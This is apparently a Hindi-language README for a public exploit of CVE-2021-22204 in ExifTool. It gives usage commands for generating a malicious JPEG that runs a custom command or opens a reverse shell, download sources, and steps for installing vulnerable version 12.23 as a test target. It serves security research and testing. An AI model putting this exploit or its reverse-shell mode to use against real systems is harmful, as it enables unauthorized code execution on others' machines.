
CVE-2021-22204 (ExifTool) के लिए शोषण - मनमाना कोड निष्पादन

यह रिपॉजिटरी पसंद है? हमें एक ⭐ दें!
केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए।
@UNICORDev द्वारा (@NicPWNs और @Dev-Yeoj)
ExifTool संस्करण 7.44 और उससे ऊपर के DjVu फ़ाइल स्वरूप में उपयोगकर्ता डेटा का अनुचित तटस्थीकरण, दुर्भावनापूर्ण छवि को पार्स करते समय मनमाना कोड निष्पादन की अनुमति देता है।
इस शोषण का उपयोग एक JPEG छवि पेलोड उत्पन्न करने के लिए करें जिसका उपयोग कमजोर ExifTool संस्करण के साथ कोड निष्पादन के लिए किया जा सकता है। एक कस्टम कमांड प्रदान किया जा सकता है या एक रिवर्स शेल उत्पन्न किया जा सकता है। एक JPEG छवि स्वचालित रूप से उत्पन्न होती है, और वैकल्पिक रूप से, पेलोड को सम्मिलित करने के लिए एक कस्टम JPEG छवि प्रदान की जा सकती है।
python3 exploit-CVE-2021-22204.py -c <command>
python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port>
python3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>]
python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>]
python3 exploit-CVE-2021-22204.py -h
-c Custom command mode. Provide command to execute.
-s Reverse shell mode. Provide local IP and port.
-i Path to custom JPEG image. (Optional)
-h Show this help menu.
GitHub से exploit-CVE-2021-22204.py डाउनलोड करें
ExploitDB से exploit-CVE-2021-22204.py डाउनलोड करें
searchsploit -u
searchsploit -m 50911

Exiftool संस्करण 12.23
Exiftool संस्करण 7.44 - 12.23
wget https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip
unzip exiftool-12.23.zip
cd exiftool-12.23
perl Makefile.PL
make test
sudo make install
exiftool -ver
exiftool image.jpg